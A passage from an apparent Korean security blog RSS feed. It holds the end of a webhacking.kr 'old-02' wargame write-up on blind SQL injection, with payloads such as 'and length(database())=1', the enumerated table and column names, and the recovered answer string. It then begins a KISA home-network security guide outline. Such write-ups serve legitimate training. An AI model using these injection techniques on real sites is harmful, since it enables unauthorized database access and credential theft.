&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;and length(database())=1&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;and length(database())=2&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;and length(database())=3&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;...&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;이렇게 값을 올리면서 확인을 할수도 있지만 길이가 길어지면 그만큼 시간도 오래 걸리므로 LOS에서 만들어 두었던 파이썬 코드를 활용해 보도록 하겠습니다. 사실 코드를 짜는 방법은 여러 가지 방법들이 있습니다. 여기에 나와 있는 코드는 정답은 아니며 더 정교하고 간단히 짤 수 있는 점 참고해 주시기 바랍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;DB 길이 확인 (DB Length 6글자)&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;610&quot; data-origin-height=&quot;147&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/C7kQu/btrVOTTne8y/OKRdkqbWHTNEacF3rAbkuK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/C7kQu/btrVOTTne8y/OKRdkqbWHTNEacF3rAbkuK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/C7kQu/btrVOTTne8y/OKRdkqbWHTNEacF3rAbkuK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FC7kQu%2FbtrVOTTne8y%2FOKRdkqbWHTNEacF3rAbkuK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;600&quot; height=&quot;145&quot; data-origin-width=&quot;610&quot; data-origin-height=&quot;147&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;파이썬 코드&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;486&quot; data-origin-height=&quot;333&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/MVt32/btrVTUQ0bew/HDkxAYVfG7Ams6l3AKMbC1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/MVt32/btrVTUQ0bew/HDkxAYVfG7Ams6l3AKMbC1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/MVt32/btrVTUQ0bew/HDkxAYVfG7Ams6l3AKMbC1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FMVt32%2FbtrVTUQ0bew%2FHDkxAYVfG7Ams6l3AKMbC1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;480&quot; height=&quot;329&quot; data-origin-width=&quot;486&quot; data-origin-height=&quot;333&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;코드에 대한 설명은 &lt;a href=&quot;https://securitycode.tistory.com/266&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;[LOS] Lord of the SQL Injection - orc&lt;/a&gt; 해당 글을 참고해 주시기 바랍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;두번째 DB의 이름 확인&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;347&quot; data-origin-height=&quot;244&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/2nzSZ/btrVUBiQnhF/HQplHeZFNOsYnK0VprvKI0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/2nzSZ/btrVUBiQnhF/HQplHeZFNOsYnK0VprvKI0/img.png&quot; data-alt=&quot;bWAPP DB 예시&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/2nzSZ/btrVUBiQnhF/HQplHeZFNOsYnK0VprvKI0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F2nzSZ%2FbtrVUBiQnhF%2FHQplHeZFNOsYnK0VprvKI0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;350&quot; height=&quot;246&quot; data-origin-width=&quot;347&quot; data-origin-height=&quot;244&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB 예시&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB를 예시로 DB의 첫 번째 글자가 &quot;a&quot;인지, &quot;b&quot;인지 쿼리를 하였을 때의 값입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;DB 이름 확인 (DB Name chall2)&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;165&quot; data-origin-height=&quot;187&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/d8yHWC/btrVUjbEJBc/2JIxuNjUAyKqFESoa2w8ek/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/d8yHWC/btrVUjbEJBc/2JIxuNjUAyKqFESoa2w8ek/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/d8yHWC/btrVUjbEJBc/2JIxuNjUAyKqFESoa2w8ek/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fd8yHWC%2FbtrVUjbEJBc%2F2JIxuNjUAyKqFESoa2w8ek%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;170&quot; height=&quot;193&quot; data-origin-width=&quot;165&quot; data-origin-height=&quot;187&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;파이썬 코드&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;531&quot; data-origin-height=&quot;377&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bBQljz/btrVUhZdmVr/MnLczHSSbi9iawKSWpjUR0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bBQljz/btrVUhZdmVr/MnLczHSSbi9iawKSWpjUR0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bBQljz/btrVUhZdmVr/MnLczHSSbi9iawKSWpjUR0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbBQljz%2FbtrVUhZdmVr%2FMnLczHSSbi9iawKSWpjUR0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;480&quot; height=&quot;341&quot; data-origin-width=&quot;531&quot; data-origin-height=&quot;377&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;세번째 DB의 테이블 이름 확인&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;776&quot; data-origin-height=&quot;121&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cYN7FT/btrVOSmBS78/D5qOslZVf9HZgKHM7YlEpK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cYN7FT/btrVOSmBS78/D5qOslZVf9HZgKHM7YlEpK/img.png&quot; data-alt=&quot;bWAPP DB 예시&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cYN7FT/btrVOSmBS78/D5qOslZVf9HZgKHM7YlEpK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcYN7FT%2FbtrVOSmBS78%2FD5qOslZVf9HZgKHM7YlEpK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;117&quot; data-origin-width=&quot;776&quot; data-origin-height=&quot;121&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB 예시&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bwapp DB의 테이블 항목&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;982&quot; data-origin-height=&quot;245&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bjmyZ7/btrVUjbHeUW/08AmSo3GwX64GrQjK9xv1k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bjmyZ7/btrVUjbHeUW/08AmSo3GwX64GrQjK9xv1k/img.png&quot; data-alt=&quot;bWAPP DB 예시&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bjmyZ7/btrVUjbHeUW/08AmSo3GwX64GrQjK9xv1k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbjmyZ7%2FbtrVUjbHeUW%2F08AmSo3GwX64GrQjK9xv1k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;187&quot; data-origin-width=&quot;982&quot; data-origin-height=&quot;245&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB 예시&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bwapp DB의 테이블 중 첫 번째 테이블 이름이 &quot;a&quot;로 시작하는지 &quot;b&quot;로 시작하는지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span&gt;chall2&lt;span&gt; DB의 테이블 확인&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;332&quot; data-origin-height=&quot;309&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/IKvuQ/btrVUh52sBw/HlKGM3H6ZK6Hgm4iwKePm1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/IKvuQ/btrVUh52sBw/HlKGM3H6ZK6Hgm4iwKePm1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/IKvuQ/btrVUh52sBw/HlKGM3H6ZK6Hgm4iwKePm1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FIKvuQ%2FbtrVUh52sBw%2FHlKGM3H6ZK6Hgm4iwKePm1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;330&quot; height=&quot;307&quot; data-origin-width=&quot;332&quot; data-origin-height=&quot;309&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;admin_area_pw, log 테이블 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;파이썬 코드&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1048&quot; data-origin-height=&quot;392&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Hhiin/btrVP9nVltR/fInHkkwNIICR8k1vWhK5ck/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Hhiin/btrVP9nVltR/fInHkkwNIICR8k1vWhK5ck/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Hhiin/btrVP9nVltR/fInHkkwNIICR8k1vWhK5ck/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHhiin%2FbtrVP9nVltR%2FfInHkkwNIICR8k1vWhK5ck%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;281&quot; data-origin-width=&quot;1048&quot; data-origin-height=&quot;392&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;네번째 DB 테이블의 컬럼 확인&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;982&quot; data-origin-height=&quot;370&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/TJWOB/btrVSukSr4k/kpxzTqSAkKsktXduQ6Q4Tk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/TJWOB/btrVSukSr4k/kpxzTqSAkKsktXduQ6Q4Tk/img.png&quot; data-alt=&quot;bWAPP 예시&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/TJWOB/btrVSukSr4k/kpxzTqSAkKsktXduQ6Q4Tk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FTJWOB%2FbtrVSukSr4k%2FkpxzTqSAkKsktXduQ6Q4Tk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;283&quot; data-origin-width=&quot;982&quot; data-origin-height=&quot;370&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP 예시&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB의 users 테이블의 첫 번째 컬럼값이 &quot;a&quot;인지 &quot;i&quot;인지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;chall2&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;DB admin_area_pw 테이블의 컬럼 확인&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;146&quot; data-origin-height=&quot;142&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/SjpcA/btrVQOjBQwU/DHPy3qEdwH1uaM7i4NcOm0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/SjpcA/btrVQOjBQwU/DHPy3qEdwH1uaM7i4NcOm0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/SjpcA/btrVQOjBQwU/DHPy3qEdwH1uaM7i4NcOm0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FSjpcA%2FbtrVQOjBQwU%2FDHPy3qEdwH1uaM7i4NcOm0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;150&quot; height=&quot;146&quot; data-origin-width=&quot;146&quot; data-origin-height=&quot;142&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;pw 컬럼 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;다섯 번째 정보 확인&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;520&quot; data-origin-height=&quot;315&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/VLweR/btrVUsfyJa1/geDiNkp6kCeevB1LQ5QHAk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/VLweR/btrVUsfyJa1/geDiNkp6kCeevB1LQ5QHAk/img.png&quot; data-alt=&quot;bWAPP DB 예시&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/VLweR/btrVUsfyJa1/geDiNkp6kCeevB1LQ5QHAk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FVLweR%2FbtrVUsfyJa1%2FgeDiNkp6kCeevB1LQ5QHAk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;520&quot; height=&quot;315&quot; data-origin-width=&quot;520&quot; data-origin-height=&quot;315&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB 예시&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB의 users 테이블의 login, password 컬럼을 확인하였고, substr을 통하여 password 컬럼의 첫 번째 글자가 무엇인지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;chall2&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;DB admin_area_pw 테이블의 pw컬럼의 정보 확인&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;318&quot; data-origin-height=&quot;245&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/7LxY5/btrVP92IKNf/a0dlyRtdti6BZ2phF0fJVk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/7LxY5/btrVP92IKNf/a0dlyRtdti6BZ2phF0fJVk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/7LxY5/btrVP92IKNf/a0dlyRtdti6BZ2phF0fJVk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F7LxY5%2FbtrVP92IKNf%2Fa0dlyRtdti6BZ2phF0fJVk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;320&quot; height=&quot;247&quot; data-origin-width=&quot;318&quot; data-origin-height=&quot;245&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;kudos_to_beistlab 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;파이썬 코드&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;626&quot; data-origin-height=&quot;385&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/HtJGB/btrVRCQI2OZ/pE3AKgQCthptWJbzLO2mIk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/HtJGB/btrVRCQI2OZ/pE3AKgQCthptWJbzLO2mIk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/HtJGB/btrVRCQI2OZ/pE3AKgQCthptWJbzLO2mIk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHtJGB%2FbtrVRCQI2OZ%2FpE3AKgQCthptWJbzLO2mIk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;620&quot; height=&quot;381&quot; data-origin-width=&quot;626&quot; data-origin-height=&quot;385&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;751&quot; data-origin-height=&quot;229&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bTFtQo/btrVT8n7k8J/Vn1E6ozjJYsqoBAKMqWBXk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bTFtQo/btrVT8n7k8J/Vn1E6ozjJYsqoBAKMqWBXk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bTFtQo/btrVT8n7k8J/Vn1E6ozjJYsqoBAKMqWBXk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbTFtQo%2FbtrVT8n7k8J%2FVn1E6ozjJYsqoBAKMqWBXk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;229&quot; data-origin-width=&quot;751&quot; data-origin-height=&quot;229&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;참고&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://ko.wikipedia.org/wiki/%ED%83%80%EC%9E%84%EC%8A%A4%ED%83%AC%ED%94%84&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://ko.wikipedia.org/wiki/%ED%83%80%EC%9E%84%EC%8A%A4%ED%83%AC%ED%94%84&lt;/a&gt;&lt;/p&gt;</description>
      <category>Code::War Game/webhacking.kr</category>
      <category>Blind Injection</category>
      <category>https://webhacking.kr/chall.php</category>
      <category>old-02</category>
      <category>sql injection</category>
      <category>wargame</category>
      <category>webhacking</category>
      <category>webhacking.kr</category>
      <category>워게임</category>
      <category>웹해킹.kr</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/270</guid>
      <comments>https://securitycode.tistory.com/270#entry270comment</comments>
      <pubDate>Tue, 10 Jan 2023 16:58:50 +0900</pubDate>
    </item>
    <item>
      <title>[KISA] 공동주택 홈네트워크 시스템 보안관리 안내서</title>
      <link>https://securitycode.tistory.com/269</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;공동주택&amp;nbsp;홈네트워크&amp;nbsp;시스템&amp;nbsp;보안관리&amp;nbsp;안내서 &lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignLeft&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/dCBzzp/btrVuBc8lV5/py9SW8PuQbMCi4fOZ2UCj1/%EA%B3%B5%EB%8F%99%EC%A3%BC%ED%83%9D%20%ED%99%88%EB%84%A4%ED%8A%B8%EC%9B%8C%ED%81%AC%20%EC%8B%9C%EC%8A%A4%ED%85%9C%20%EB%B3%B4%EC%95%88%EA%B4%80%EB%A6%AC%20%EC%95%88%EB%82%B4%EC%84%9C.pdf?attach=1&amp;amp;knm=tfile.pdf&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;공동주택 홈네트워크 시스템 보안관리 안내서.pdf&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;8.56MB&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;br /&gt;Ⅰ.&amp;nbsp;개요 &lt;br /&gt;&amp;nbsp;1.&amp;nbsp;배경 &lt;br /&gt;&amp;nbsp;2.&amp;nbsp;안내서&amp;nbsp;목적&amp;nbsp;및&amp;nbsp;구성 &lt;br /&gt;&lt;br /&gt;Ⅱ.&amp;nbsp;홈네트워크&amp;nbsp;시스템&amp;nbsp;보안점검&amp;nbsp;항목&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;br /&gt;&amp;nbsp;1.&amp;nbsp;네트워크&amp;nbsp;및&amp;nbsp;보안장비 &lt;br /&gt;&amp;nbsp;2.&amp;nbsp;서버 &lt;br /&gt;&amp;nbsp;3.&amp;nbsp;관리PC &lt;br /&gt;&lt;br /&gt;Ⅲ.&amp;nbsp;주요&amp;nbsp;시스템&amp;nbsp;보안설정&amp;nbsp;및&amp;nbsp;점검&amp;nbsp;절차 &lt;br /&gt;&amp;nbsp;1.&amp;nbsp;네트워크&amp;nbsp;및&amp;nbsp;보안장비 &lt;br /&gt;&amp;nbsp;2.&amp;nbsp;서버 &lt;br /&gt;&lt;br /&gt;Ⅳ.&amp;nbsp;관리PC&amp;nbsp;보안설정&amp;nbsp;및&amp;nbsp;점검&amp;nbsp;절차 &lt;br /&gt;&amp;nbsp;1.&amp;nbsp;계정&amp;nbsp;관리&amp;nbsp;및&amp;nbsp;보안설정 &lt;br /&gt;&amp;nbsp;2.&amp;nbsp;불필요한&amp;nbsp;서비스&amp;nbsp;비활성화 &lt;br /&gt;&amp;nbsp;3.&amp;nbsp;운영체제&amp;nbsp;최신&amp;nbsp;보안&amp;nbsp;업데이트 &lt;br 